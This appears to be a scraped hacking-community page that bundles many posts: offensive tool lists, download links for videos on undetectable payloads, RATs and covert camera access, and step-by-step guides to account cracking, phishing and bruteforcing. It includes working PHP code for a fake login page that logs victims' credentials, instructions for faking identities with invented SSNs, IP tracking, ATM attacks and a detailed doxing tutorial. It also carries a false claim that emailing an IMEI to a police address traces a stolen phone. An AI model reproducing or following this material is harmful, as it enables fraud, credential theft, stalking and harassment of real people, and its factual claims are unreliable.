XLAR8 - All About tech | Tech terms

The BiGsec Community

⚔️ 🛡️

MITM:
➤ SSLstrip ( https://github.com/moxie0/sslstrip )
➤ Ettercap ( https://www.ettercap-project.org )
➤ Driftnet ( https://github.com/deiv/driftnet )
➤ DSniff ( https://sectools.org/tool/dsniff/ )

SQL Injection:
➤ SQLMAP ( https://github.com/sqlmapproject/sqlmap )
➤ Uniscan ( https://github.com/poerschke/Uniscan )
➤ W3af ( https://github.com/andresriancho/w3af/ )
➤ Nikto ( https://github.com/sullo/nikto )

Virusses(Backdoor's nothing special here):
➤ Metasploit ( https://github.com/rapid7/metasploit-framework )
➤ Shellter ( https://www.shellterproject.com )

Cracking:
➤ John the ripper ( https://www.openwall.com/john/ )
➤ Hydra ( https://sectools.org/tool/hydra/ )
➤ Aircrack ( https://www.aircrack-ng.org )

DDos tools:

We have a few shells that supports stressing nothing special. And i can recommend:
➤ TorsHammer ( https://github.com/dotfighter/torshammer )
➤ GoldenEye ( https://github.com/jseidl/GoldenEye )
➤ Hping3 ( hping.org )
➤ Pyloris ( https://motoma.io/pyloris/ )
➤ HULK ( https://github.com/grafov/hulk )
➤ Blacknurse ( https://github.com/opsxcq/exploit-blacknurse )

XSS:
➤ BEef ( https://beefproject.com )

Info-gathering/portscanners:
➤ Nmap ( https://nmap.org/download-html )
➤ Zenmap ( https://nmap.org/zenmap/ )

Virusses/rat's general backdoors:
➤ Thefatrat ( https://github.com/Screetsec/TheFatRat )
➤ Nanocore ( No Download Available Find Manually )

Other Tools:
➤ Commix ( https://github.com/commixproject/commix )
➤ Wifite ( https://github.com/derv82/wifite2 )
➤ Ghostphisher ( https://github.com/savio-code/ghost-phisher )

Enjoy! Follow us for more...

How to make payload FUD that made from metasploit.mp4

Download now

Follow us for more...

How to mennually inject payload in any application.mp4

Download now

Installation usage and working of SpyMaxRAT.mp4

Download now

Follow us for more...

Installation, usage and working of RAT .mp4

Download now

Follow us for more...

Out of internet attack using port forwarding.mp4

Download now

Follow us for more...

How to create reconnectable or autoconnect payload.mp4

Download now

Follow us for more...

Ethical Hacking – Latest Terminologies.mp4

Download now

Follow us for more

Man In The Middle (ANDROID).mp4

Download now

Follow us for more...

Unlimited Gmail Accounts creator

| You dont have to create them anymore 🔥

1) First of all you will need one gmail account

2) Then go to the site https://thebot.net/api/gmail/ and put that account name there without @gmail.com

3) Just press "Generate" and you will get Thousands of Accounts

4) They are all Connected with your first account so you just have to use your first one for all the accounts

So if I send a mail to any of these accounts you will receive it on your inbox of the first account.

Enjoy 👍❤️

Follow us for more...

Edu Mail Creator Bot

🔰🔰

🌀Python Programmed Bot
🌀Check Edu Mail Benefits In The Link

Edu Mail Benefits:
Amazon Prime Account
The Washington Post Premium Account
The Newyork Times Account
Apple iPhone Discounts for Students
Adobe Creative Cloud
Spotify Account
MS office 365
Github Developer Student Account
Get Huge Discounts on Cell Phone Plans
Get Google Drive Storage Account

Instructions To Run The Program:
1. Open CMD
2. Set Path Where Run_me.py Is (cd C:….)
3. Type In CMD: python run_me.py
4. Accounts Are Stored In “accountinfo.txt”

Link: https://anonfile.com/P90cH5u6od/edu_mail_rar
Password: 777

Enjoy! Follow us for more...

How to Crack Accounts ? - Basics for Noobs

🔰

#Most_Requested_Topic

This is how to crack accounts for people who are literally noobs, meaning that you have no idea what cracking is and how it works.
This would've been something I wished I had when I started out cracking.

Basically what cracking is, it's taking combolists, and running them through a program to check if that info is valid.
You usually want to use proxies so your IP doesn't get banned Combolists: It's a txt file full of emails and passwords, in the format emailass
Proxies: The "gateway" between you and the internet.
Basically use this so your IP doesn't get banned.
Checkers: These are the checkers you use to check the combolist.

🔰Steps of Cracking:🔰

1. Get a combolist
2. Get a checker for whatever account you want to crack
3. Get proxies
4. Load combolists and proxies into the checker

5. Press start Your checker should now start checking each email from different proxies to see if it's a valide combo for that service You use proxies since the company, let's say Disney again, will ban your IP for logging in too many times.
The proxy makes it so it seems like your logging in from different locations each time.

Beware cracking is ILLEGAL.
But the risk is very low.
Cracking is unethical.
Anyway, have fun!

Enjoy! Follow us for more...

How To Make A Fake Login Page To Steal Password

🔥 🔥

I WONT BE RESPONSIBLE WHAT U DO WITH IT

Hello this is a tutorial on how to make a fake login page.

Before we start I want to say that I did not make this guide and am simply sharing it here.

1- open up the site that you want to make the fake page from it, after the load right click and save the page as “web page complete”

2- now open that page with notepad, and press control+F to access search bar, and then search “login”

3- behind the word “login” it’s written .action, we don’t need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx)

4- if you saw method=”post” change it to method=”GET”

5- ok now save it as .html

6- open a new notepad, and write this commands on it:<?php

header (‘Location:target.com’);

$handle = fopen(“log.txt”, “a”);

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle , $value );
fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

7- instead of Location: target.com, write your login page address!

8- now save this as Login.PHP

9- go to website’s that offer free hosts

000Webhost.com

https://www.awardspace.com/

https://infinityfree.net/

10- make an account, get your host and upload both of files!

11- after that you only need to give your HTML link to your victim!

12- if he opened and write his Login information you can access it!

13- if you look at PHP source, you can see log.txt that’s where your victim info’s saved.

This Post is just for raising your information, and I do not accept responsibility for your misuse.

Enjoy! Follow us for more...

HOW TO TRACE A MISSING OR STOLEN PHONE ?

🔰🔰
◽◽◽◽◽◽◽◽◽◽
If you lose your #mobile phone, you can #trace it without going to the police.
➖➖➖➖➖➖➖➖➖➖
Most of us always fear that our phones may be #stolen at any time.
➖➖➖➖➖➖➖➖➖➖
Each phone carries a unique
#IMEI no. i.e. International Mobile Equipment Identity No which can be used to track it anywhere in the world.

This is how it works:
➖➖➖➖➖➖➖➖➖➖
1. Dial \*#06# from your mobile.
➖➖➖➖➖➖➖➖➖➖
2. Your mobile phone shows a unique 15 digit.
➖➖➖➖➖➖➖➖➖➖
3. Note down this number at a secure place except in your mobile phone itself as this is the #number which will help trace your phone in case of theft.
➖➖➖➖➖➖➖➖➖➖
4. Once stolen, just E-mail this 15 digit IMEI No. to cop@vsnl.net with details as stated below:

Your name:
Address:
Phone model:\_
Make:\_
Last used No.:\_
E-mail for communication:\_
Missed date:\_
IMEI No :\_
➖➖➖➖➖➖➖➖➖➖
5.Your Mobile will be #traced within next 24 hours via a complex system of GPRS and internet, You will find where your hand set is being operated and the new user's No. will be sent to your #email.
➖➖➖➖➖➖➖➖➖➖
6. After this, you can inform the Police with the details you got.

Enjoy! Follow us for more...

GET PERSONAL NUMBER FOR RECEIVING SMS

⚠️

1. Twilio.com
2. Textnow.com
3. Countrycode.org
4. Wp.pinger.com
5. Textmagic.com
6. Esendex.co.uk - (It's easy to get a trial period using a virtual number by fast registration, the package includes 25 free messages, the restriction of use in 7 days.No credit card is required.You can be counted for a personal number!)
7. Burstsms.com.au - (Similar service as the previous one, fast registration, the probe includes 14 days You do not need a credit card, so you can count as a personal number!)
8. Directsms.com.au - (You register, you get a free 30-day trial version Business sms. Personal Wirth.number!)
9. Vumber.com - (Register, receive a 14-day trial version.) Personal

PUBLIC NUMBER FOR RECEIVING SMS➖

1. Receive-sms-online.info
2. Receivefreesms.net
3. Sms-receive.net
4 . Receive-a-sms.com
5. Hs3x.com
6. Receive-sms-now.com - (There are Russian numbers)
7. Smsreceivefree.com
8. Receivesmsonline.com
9. Getsms.org - (Рус.номера)
10. Tempsms.ru - (Rus.number)
11. Numberforsms.com - (There are Russian numbers)
12. Sonetel.com
13. Smska.us - (Rus.number)
14. Sellaite.com
15. Sms.ink - (Rus.numera)
16. Proovl.com
17. Onlinesim.ru
18. Zadarma.com - (There are Russian numbers)
19. Smsc.ru - (You need to register, there are Russian and Ukrainian numbers)
20. Freevirtualnumber.skycallbd.com
21. Getfreesmsnumber.com
22. Receive-smsonline.net - Yearly design
23. Receivefreesms.com
24. Receivesmsverification.com
25 Sms-online.co
26. Ireceivesmsonline.com
27. Receive-sms-online.com - (There are a number of scores)
28. Receive-sms-free.com
29. Esendex.com.au - (Registration required)
30. Receivesmsonline .in
31. Mytrashmobile.com
32. Receivesmsonline.me
33. Anon-sms.com
34. Mfreesms.com
35. Spryng.nl - (You need to register)
36. Smsreceiveonline.com
37. Smsget.net - (Megaphone and Beeline)

Enjoy! Follow us for more...

How to build fully undetectable payload for android.mp4

Download now

Enjoy! Follow us for more...

How to Track Anyone by Sending Them a Message ?

💢💢 🔰

1) Go to Grabify and make your account there by clicking on register.

2) Get the link (URL) of anything you want to send like wallpaper, music, video, etc.

3) Now login to Grabify.

4) After login in to Grabify, go to home page. There you will see a box where you can paste url. So, paste the copied url in that box and click on create url.

5) After this, URL will be created and you will be redirected to the page where you will see new URLs.

6) Now copy the newly generated URL or google URL (anyone) and send it to that person whom you want to track. You can use any social media platform like Facebook, Whatsapp, Telegram or you can send directly to their phones as a sms.

Okay so here we have got the IP Address of the user whom we wanted to trace. Now let's get some more information about him/her.

So, to get information about user, copy the IP address of that person and go to IP2Location and paste IP address there.

So, now just copy the Longitude and Latitude of the user that you got in the previous step and search it on Google, you will get map location.

Enjoy! Follow us for more...

Install socialfish in termux.

To install SocialFish we will need to

pkg install python

pkg install php

pkg install curl

pkg install git

pkg install unzip

pkg install wget

Or use this command

pkg install python php curl git unzip

Then we download the tool from Github

git clone https://github.com/UndeadSec/SocialFish.git

Then we open the tool file
cd SocialFish

Then we use it
chmod + x *

Then

pip install -r requirements.txt

To open the tool we use

python SocialFish.py

Wait for download ngrok

After downloading the tool opens, choose the command y

Then put your mail option n / y you are free to do so

Choose the letter s and choose the page you want to create on any website

Type an example Facebook link
URL: https://www.facebook.com

It will give you a fake link that looks just like Facebook. Deceive your friends or whoever you want to hack your account
Explanation of installing the tool and making a false link to Facebook
I do not allow the source to change

Enjoy! Follow us for more...

Cracker Hash Online

🔘 🔘

https://crackstation.net/
http://crypo.in.ua/tools/
http://www.md5decrypter.co.uk/
http://www.md5this.com/index.php
http://md5hack.com/
http://www.miraclesalad.com/webtools/md5.php
http://hash.online-convert.com/md5-generator
http://md5decryption.com/
http://www.netmd5crack.com/cracker/
http://www.md5decrypter.com/
https://isc.sans.edu/tools/reversehash.html
http://www.md5crack.com/
http://md5.web-max.ca/
http://www.md5.net/
http://www.cmd5.org/
http://md5pass.info/
http://md5.darkbyte.ru/
http://www.tydal.nu/article/md5-crack
http://tools.benramsey.com/md5/
http://www.xmd5.org/index_en.htm
http://www.hash-cracker.com/
http://www.md5.cz/
http://www.md5decryption.com/
http://www.adamek.biz/md5-generator.php
http://www.whatsmyip.org/hash-generator/
http://www.hashemall.com/
www.hashgenerator.de
http://blog.faultylabs.com/?d=md5
http://www.xorbin.com/tools/md5-hash-calculator
https://www.functions-online.com/md5.html
http://md5.com.cn/
http://tools.benramsey.com/md5/
http://www.cmd5.org/
http://www.crypo.com/
https://www.freerainbowtables.com/de/hashcracking/
http://www.insidepro.com/hashes.php?lang=rus
http://www.md5.com.cn/
http://md5cracker.org/
http://hashkiller.co.nf/
http://hashkiller.co.nf/mail.php
http://www.onlinehashcrack.com

Enjoy! Follow us for more...

HOW TO CREATE UNLIMITED INSTAGRAM ACCOUNTS ?

🤳🖼️ **🖼️🤳

*INSTALLATION*

*1) Clone the code repo*

git clone https://github.com/kaex/Insta-mass-account-creator.git

*2) Navigate to the code repo*

cd Insta-mass-account-creator

*3) Run the damn script*

php start.php -l 5 -p proxies.txt

🤳 This script creates accounts with random name and username gets by the web. All user created are older 18 years

🤳 This script helps you follow multiple accounts with the account's you've created

⚠️ *Important*⚠️

After ~ 1-24 hours new fake Instagram account with an unverified phone number cannot do any requests. All requests will be redirected to the page
https://instagram.com/challenge.

Enjoy! Follow us for more...

BEST DEEPWEB HACKING FORUM

🐠🌐 ** 🌐🐠

Most of below forums are online 24/7 however sometimes TOR servers can get offline for various reasons.

*ASSUMPTIONS*

✔ You have TOR browser
✔ You spoofed MAC, changed hostname, cleared temp files etc. For android change IMEI , Android ID etc etc
✔ You know what you are looking for

⚠ *Do not run programs you from anyone. Scan them first and run them in a sandbox environment*

http://2gxxzwnj52jutais.onion/phpbb/index.php – Onion Forum 2.0 renewed
http://3fyb44wdhnd2ghhl.onion/ib/ – Onii-Chan
http://bx7zrcsebkma7ids.onion – Jisko
http://npdaaf3s3f2xrmlo.onion/ – Twitter clone
http://jv7aqstbyhd5hqki.onion – HackBB – Hacking & cracking forum
http://xdagknwjc7aaytzh.onion/20/http/1.4.7.9/forummain.htm – Read only access to the Freenet FMS forums via the Anonet Webproxy
http://sbforumaz7v3v6my.onion/ – SciBay Forums
http://kpmp444tubeirwan.onion/ – DeepWeb
http://r5c2ch4h5rogigqi.onion/ – StaTorsNet
http://hbjw7wjeoltskhol.onion – The BEST tor social network! File sharing, messaging and much more. Use a fake email to register.
http://t4is3dhdc2jd4yhw.onion/ – OnionForum 3.0 – New Onionforum for general talk, now with marketplace
http://zw3crggtadila2sg.onion/imageboard/ – TorChan – One of the oldest chans on Tor.

Stay safe and have fun😊

🎭hackersWORLD🌐

Enjoy! Follow us for more...

Bruteforce Twitter 🐦 Account

**

TweetShell allows you to hack an account by bruteforcing it.

Its multi-threaded which means it's more fast than those single threaded tools out there.

💡 *For Noobs: Bruterforce is type of attack that tries to guess credentials by submitting all possible values. Its not limited to credentials only, it can be used to bypass WAFS, IDS and IPS, it can be used to find vulnerabilities. 😉*

*INSTALLATION*

*0) Install requirements*

pkg install curl tsudo

*1) Clone the tool*

git clone https://github.com/thelinuxchoice/tweetshell

*2) Navigate to tweetshell directory*

cd tweetshell

*3) Change some permissions*

chmod +x tweetshell.sh

*4) Run the dam script*

sudo ./tweetshell.sh

Enjoy! Follow us for more...

How to create free .edu email ?

*PART 1:*📖

🐾Step 1:

Go to this https://www.apply.vccs.edu/Home/Sign_In/Logon.aspx and solve captcha. Then Click on new user and then sign up with email.

🐾 Step 2:

To fill the detail you can use your real name and email but if you are not an US citizen then you can use this (https://www.fakeaddressgenerator.com/usa_address_generator) to generate fake user detail. [For temporary email you can go https://emailfake.com/.] For Eg:

Full Name Mary N Morey
Gender female
Title Mrs.
Race Black
Birthday 11/16/1957
Social Security Number 306-90-8491

💡 *Note: Save name, username and password in notepad or somewhere it may need later*

🐾 Step 3:

After filling all the detail click on submit.

Now that you have created account lets move on to part two of this tutorial.

*PART 2:*📖

After creating account and loging into click on Apply Now. Select any college name from the list and click on Apply. A pop-up will open then click on Apply Now (OR CONTINUE APPLICATION) BUTTON. Then you are asked for different questions. You can answer these questions randomly or you can use the detail below to answer these questions.

First name and last name: Put the name that you have entered in part 1. Leave other field empty.

Birthdate, Social Security Number: Enter details which was generated from this https://www.fakeaddressgenerator.com/usa_address_generator .

Gender: Male/Female (as you like)

Racial or ethnic identification: White

Hispanico or Latino : No

Have you ever applied, attended …… : No

After that click on Save and Continue.

For Mailing address use the detail generated from this link.

Is this your permanent address: Yes

You can leave telephone number blank.

Then check on I have reviewed the guidelines box and click on save and continue.

Which ….. high school education: I don’t have a GED/High …….

Last date attended: 01/2017

Highest grade completed: 11th grade.

Have you ever attend …. : No

I have planned to earn a degree…..: No

I plan to start class: Choose any

After that click on Save and Continue.

Have you ever served …….. military: No

Are you …….. military: No

After that click on Save and Continue.

Parent 1 and 2: Choose any.

What is your current status?: Native US……

Primary spoken language: English

Do you want……: No

After that click on Submit your completed application.

*PART 3* 📖

After successfully completing the application put on your signature i.e your full name. Then you will be redirect to with all your detail. Under the student information you will get your username and temporary password. Note down that password, username and other details.

After that you can go

If link not open try later then works because this anonymously https://bit.ly/38wwKJc and login where you will get your .edu email.

💡 *Note: It will take more than 6hours for the login credentials to activate. So you will get error that your username and password is invalid*

Enjoy! Follow us for more...

creating backup with tar.mp4

Download now

Enjoy! Follow us for more...

File System Permissions.mp4

Download now

Follow is for more...

Decoding the IP Layer.mp4

Download Now

Enjoy! Follow us for more...

Declaring content sources and content security policy (CSP).mp4

Download now

Follow us for more...

How to bypass your application from Google play protect.mp4

Download now

Follow us for more...

How to make Android app with auto allowed permission.mp4

Download now

Follow us for more...

How to create administration permission enabled apk.mp4

Download now

Follow us for more...

How you can access front or rear camera of others Android secretly.mp4

Download now

Enjoy! Follow us for more...

Tips To Help Protect Your Devices Against Ransomware Attacks

━━━━━━━━━━━━━
Install and use trusted security software on all your devices, including your mobile phone.

Keep your security software up to date. It can help protect your devices against cyberattacks.

Update your operating system and other software. This can patch security vulnerabilities.

Avoid reflexively opening email attachments. Why? Email is one of the principal methods for delivering ransomware.

Be wary of any email attachment that advises you to enable macros to view its content. If you enable macros, macro malware can infect multiple files.

Back up your data to an external hard drive. If you’re the victim of a ransomware attack, you’ll likely be able to restore your files once the malware has been cleaned up.

Consider utilizing cloud services. This can help mitigate a ransomware infection, since many cloud services retain previous versions of files, allowing you to “roll back” to the unencrypted form.

Don’t pay the ransom. You could pay a ransom in hopes of getting your files back — but you might not get them back. There’s no guarantee the cybercriminal will release your data.

Encryption is essential to help protect your sensitive personal information. But in the case of ransomware attacks, it can be used against you. It’s smart to take steps to help you gain the benefits and avoid the harm.
━━━━━━━━━━━━━

@hacker15bros

Enjoy Follow us for more...

BEST METHODES FOR HACKING ATM

**

1) fake processing center :

>This method can be used if an attacker is able to access the cable that connects the cashier to the network. A hacker disconnects the ATM from the bank's network and then connects it to a device that acts as a fake processing center.

>The cashier is used to control the withdrawal of cash and sends commands to the cashier requesting that money be withdrawn from the selected tray. Voila! The attacker can use any card or enter any PIN code, the false transaction would seem legitimate.

2) remote attack on several ATMs

> In this method an infiltrate is needed to work in the bank. The offender remotely obtains (acquires) a key used to open the cashier's rack. Although this key does not allow the attacker to access the withdrawal of money, the network cable would be exposed. The hacker disconnects the ATM from the bank's network and connects a special device that sends all the data to its own server.

> Often, the network to which you connect to the ATM is not segmented and the ATMs themselves may be misconfigured. In this case, with this device, a hacker could compromise several ATMs at once, even if the malicious device is only connected to one of them.

>The rest of the attack is carried out as we have explained before. A fake processing center is installed on the server and the attacker gains full control over the cashier. Using any card, the culprit can withdraw money from the cashier, regardless of the model

3) Black Box Attack

> As in the method described above, the attacker obtains the key from the cashier's frame and puts the machine into maintenance mode. Then, the hacker connects the so-called black box to the exposed USB port. A black box is a device that allows the hacker to control the cash drawer.

> While the criminal alters the cashier, the screen shows a message that says "in maintenance" or "out of service", although, in reality, it is possible to get money from it. In addition, the black box can be controlled wirelessly with a smartphone .

> hacker only has to press a button on the screen for sacardinero in cash and get rid of the black box to hide the evidence.

4) malware attack

> There are two ways to infect a cashier with malware : inserting a USB device with malware (that means having the key to open the cashier's rack) or infecting the machine remotely, all after having compromised the bank's network.

> If the cashier is not protected against malware and does not use whitelists, a hacker can have the malware send commands to the cashier and sell money. The attack could be repeated until the cashier's money runs out.

Enjoy! Follow us for more...

HOW TO ACCESS ROOT IN TERMUX WITHOUT ROOT ?

Open termux in your android type apt update && apt upgradeNow Install wget type: apt install wget -y

Now install proot: apt install proot -y

Install git: apt install git -yNow install git clone https://github.com/MFDGaming/ubuntu-in-termux.git

Now type cd ubuntu-in-termuxNow type chmod +x *

Run the script: ./ubuntu.sh -yNow just start ubuntu: ./startubuntu.sh

Now you can see root@localhost has been appeared

Enjoy! Follow us for more...

What is Scareware ?

Scareware:
Scareware is a type of malware designed to trick victims into purchasing and downloading useless and potentially dangerous software.

Scareware, which generates pop-ups that resemble Windows system messages, usually purports to be antivirus or antispyware software, a firewall application or a registry cleaner. The messages typically say that a large number of problems -- such as infected files -- have been found on the computer and the user is prompted to purchase software to fix the problems. In reality, no problems were detected and the suggested software purchase may actually contain real malware. If the user falls for the scam, he will lose the money he paid for the useless software and he may also make his computer unusable. Frequently, the message window has a clickjacking feature that takes the user to the attacker's Web site or initiates a malware download if the user clicks "Cancel" or the "X" to close the window.

Stay tuned for more such information.

How to install latest APKTOOL in Kali linux.mp4

Download now

Enjoy ! Follow us for more...

Port forwarding with static IP.mp4

Download now

Follow us for more

Basic Doxing Tutorial

You've probably seen verious people such as political members, FBI, CIA, police officers and other scrubs on the internet that have been d0xed.

The power a d0x has is great, people usually dont know what its actually capable of. They underestimate them greatly.
D0xing is in some way, an art. The art of investigation and finding loads of personal information just through the internet.
You can find anything you want, if you know where to look. The victim will be spammed with phone calls, pizza bombs, emails, texts,
DDoS attacks, ect.

What you'll need: 🧿

1️⃣ Internet Connection (Obvs, a good proxy or a VPN would be a good idea if you got one.)

2️⃣ Google Chrome or Mozilla Firefox (Faster and better security than IE, I personally use MFF.)

3️⃣ Notepad or paper (If you like typing, use notepad.)

4️⃣ Pastebin.com Account (To share the d0x with the world!)

5️⃣ A good reason (Don't just d0x some n00b for fun, a good reason is better. Like a political figure, abusive cop, or someone that is blackmailing, just something that people will frown upon.)

6️⃣ A good group of d0xerz (Optional, but very useful. Good communication is key here.)

7️⃣ Patience (Proper d0xes take time, could be an hour to a few days.)

Useful Websites: 🕸

- www.google.com (obvs, its always a good place to start.)

- www.facebook.com (If they have it, add them, save some of their pictures and save all
of their info and where they work.)

- www.namechk.com (To see if the persons username is taken on a wide veriety of websites.)

- www.pipl.com (Like google, but it will hide most of the crap you'll get from google.)

- www.spokeo.com (A premium account will be the best for you.)

- www.whois.org (If they own any websites, look em up.)

- www.zabasearch.com/ (No Success with Whitepages? Try this.)

- www.zoominfo.com/(Professional career and employment.)

- wink.com/ (Another people search.)

- www.freeality.com (Name, city, and state.)

- www.infospace.com/ (Companies by name, category, or city.)

- www.isearch.com (Phone Books.)

- www.whitepages.com/find_neighbors (Need to confirm d0x? Calling neighbors and asking for the target.
They tell you how you can reach them.)

- www.411.com/ (Source for free people and business searches in the US and Canada.)

- infobel.com (Links to almost every phonebook in the world.)

- http://com.lullar.com/ (A profile searcher for social networking sites.)

- http://www.checkusernames.com/ (Check to see if a username has been used on over 9000 websites.)

- http://www.ip2location.com/ (Accurate!)

- http://www.paterva.com/web5/ (It provides excellent results when e-mail addresses and full names are used.)

- http://www.archive.org/index.php (Find deleted webpages.)

- https://www.iplocation.net (Find the IP of a protected site.)

- http://exif.regex.info/exif.cgi (EXIF data searcher.)

Once you have the basics, like their name and what town they live in, you then could
search up their towns whitepages, then search their name and there you go! You got their address and their landline!

Facebook is also a great place to look, it usually has where they work, there family members, email addresses, phone numbers, ect.
You can also take a look through their pictures too, maybe they'll have a pic of their car? Now you know what they drive! Also, look for pictures of anything that could be used against them. Pictures of them drinking/smoking (if their underage).

If you found out where they work, you can go onto the employers website and snag thier work number,
email and sometimes even their cell phone number.

Run a quick search on google.com or pipl.com with their email, it then could lead to XBL or PSN gamertags, which then could lead to friends and IP addresses. You can get IP address on Xbox LIVE with a program called Cain & Abel. Here's a youtube tut how to do it.
http://www.youtube.com/watch?v=e19D9E3e0b0

You can get someones IP address just trough email. Just email them and wit for a replay, when you get a reply.
You got their IP (Assuming they arent using a VPN). Im not going to tell you on here, so heres a linky: http://aruljohn.com/info/howtofindipaddress/

If you know the the victim personally, it will be much easier to d0x them, ovbs.

Proper d0x format:
------------------
If you can find out everything about your victim, post it.
Put their basic info first.

Name:
Sex:
Eye Color:
Hair COlor:
Weight:
Height:
Age:
Date of Birth: (AKA, DoB. Also usually posted in DD/MM/YYYY format.)
SSN: (If you know it, post it. But dont get caught!)
Religious Views:
Medical Condidtion(s):
Education:
Occupation:
Political Party:

Then put their basic contact info.

Country:
Region/City:
Address:
Timezone:
ZIP Code/Postal Code:
Home Phone #:
Work #:
Cell Phone #:
Cell Phone Carrier:

Then put their online info.

Screenname:
Eamil Addres(s):
IP Address:
ISP:
Connection Status:
Facebook Account:
MySpace Account:
Twitter Account:
Hi5 Account:
Nexopia Account:
Skype Account:
XBL/PSN:

Next, put their records (Criminal/Medical/Military Service of you know them.)

Criminal Record:
Medical Record:
Military Service:

If you want, you can put their childrens info,
But it will look bad on you!

Name:
Age:
DoB:

You can also put their parents info if you want them to be spammed too.

Fathers Name:
Marrige Status: (If they are divorced, mention it)
Counrty:
Region/City:
Address:
ZIP Code/Postal Code:
Home Phone #:
Cell Phone #:
Email Address:
Occupation:

Mothers Name:
Maiden Name:
Marrige Status:
Counrty:
Region/City:
Address:
ZIP Code/Postal Code:
Home Phone #:
Cell Phone #:
Email Address:
Occupation:

If you have any other info on your victim, feel free to post it.

Pets Name(s):
Favorite Food(s):
Best Friend(s):
Sexual Preferance:
Known Passwords:
Current Vehicle:
License Plate Number:
VIN Number:

Enjoy! Follow us for more...

Enumeration Tutorial

Top 44 Ports (Basics)

1️⃣ FTP - Port 21
2️⃣ SSH - Port 22
3️⃣ Telnet - Port 23
4️⃣ SMTP | Port 25 and Submission Port 587
5️⃣ DNS - Port 53
6️⃣ Finger - Port 79
7️⃣ HTTP - Port 80
8️⃣ Kerberos - Port 88
9️⃣ POP3 - Port 110
1️⃣0️⃣ RPCInfo - Port 111
1️⃣1️⃣ Ident - Port 113
1️⃣2️⃣ NetBios
1️⃣3️⃣ SNMP - Port 161
1️⃣4️⃣ Check Point FireWall-1 Topology - Port 264
1️⃣5️⃣ LDAP - Port 389
1️⃣6️⃣ SMB - Port 445
1️⃣7️⃣ Rexec - Port 512
1️⃣8️⃣ Rlogin - Port 513
1️⃣9️⃣ RSH - port 514
2️⃣0️⃣ AFP - Apple Filing Protocol - Port 548
2️⃣1️⃣ Microsoft Windows RPC Services | Port 135 and Microsoft RPC Services over HTTP | Port 593
2️⃣2️⃣ HTTPS - Port 443 and 8443
2️⃣3️⃣ RTSP - Port 554 and 8554
2️⃣4️⃣ Rsync - Port 873
2️⃣5️⃣ Java RMI - Port 1099
2️⃣6️⃣ MS-SQL | Port 1433
2️⃣7️⃣ Oracle - Port 1521
2️⃣8️⃣ NFS - Port 2049
2️⃣9️⃣ ISCSI - Port 3260
3️⃣0️⃣ SAP Router | Port 3299
3️⃣1️⃣ MySQL | Port 3306
3️⃣2️⃣ Postgresql - Port 5432
3️⃣3️⃣ HPDataProtector RCE - Port 5555
3️⃣4️⃣ VNC - Port 5900
3️⃣5️⃣ CouchDB - Port 5984
3️⃣6️⃣ Redis - Port 6379
3️⃣7️⃣ AJP Apache JServ Protocol - Port 8009
3️⃣8️⃣ PJL - Port 9100
3️⃣9️⃣ Apache Cassandra - Port 9160
4️⃣0️⃣ Network Data Management Protocol (ndmp) - Port 10000
4️⃣1️⃣ Memcache - Port 11211
4️⃣2️⃣ MongoDB - Port 27017 and Port 27018
4️⃣3️⃣ EthernetIP-TCP-UDP - Port 44818
4️⃣4️⃣ UDP BACNet - Port 47808

Perform A Ping sweep : 🧹
$ nmap -sP -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4 <IP>

$ nmap -sP -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4 192.168.0.1

-sP = Scan Ports
-PE = ICMP echo, timestamp, and netmask request discovery probes
-PP = same as PE
-PS21,22.... = TCP SYN/ACK, UDP or SCTP discovery to given ports
-PA = same as PS
-T4 = Fast Scan
--source-port (source port from which we scan)

Scan 50000 IPs
$ nmap -n -sL -iR 50000 -oN -

Scan Specific Target 🧿
$ nmap -v -n -PE -Pn <target>
-n = never do DNS resolution
-v = verbose output -vv is higher verbosity level
-PE = ICMP echo, timestamp and netmask request discovery probes
-Pn = Bypassing Ping Probe Requests

$ nmap -v -n -PE -PO <target>
-PO = IP Protocol Ping

Scan Specific Ports 🔌
$ nmap -v -n -PS21-23,25,53,80,443,3389 -PO -PE -PM -PP <target>

$ nmap -sL 54.248.103.0/24 -oG -
-sL = List scan
-oG = Output scan

Scan network with Firewall : 🔥🚧
$ nmap --script firewalk --traceroute <target> -vv

$ traceroute 192.168.20.2

$ hping -R 192.168.20.2 -V

TCP SYN/ACK, UDP or SCTP discovery to given ports
$ nmap -PS/PA/PU/PY

ICMP echo, timestamp, and netmask request discovery probes 🕔
$ nmap -PE/PP/PM

Never do DNS resolution/Always resolve [default: sometimes] 🚫
Never do DNS resolution | -n
Always resolve | -R

Scan Techniques
1️⃣ TCP SYN scan -sS
2️⃣ Connect scan -sT
3️⃣ ACK scan -sA
4️⃣ Window scan-sW
5️⃣ Maimon scan -sM
6️⃣ UDP Scan -sU
7️⃣ TCP Null scan -sN
8️⃣ FIN scan -sF
9️⃣ Xmas scan -sX
1️⃣0️⃣ IP protocol scan -sO

Scan UDP ports with Nmap, e.g.:
$ nmap -sU -p U:53,161 <target>

Scan "number" most common ports
$ nmap -sS --top-ports "1000" <target>

More :
https://highon.coffee/blog/nmap-cheat-sheet/

This is a list of common ports that will give you a pretty good list of "alive" system when scanning internally or externally.

📄 List of ports :
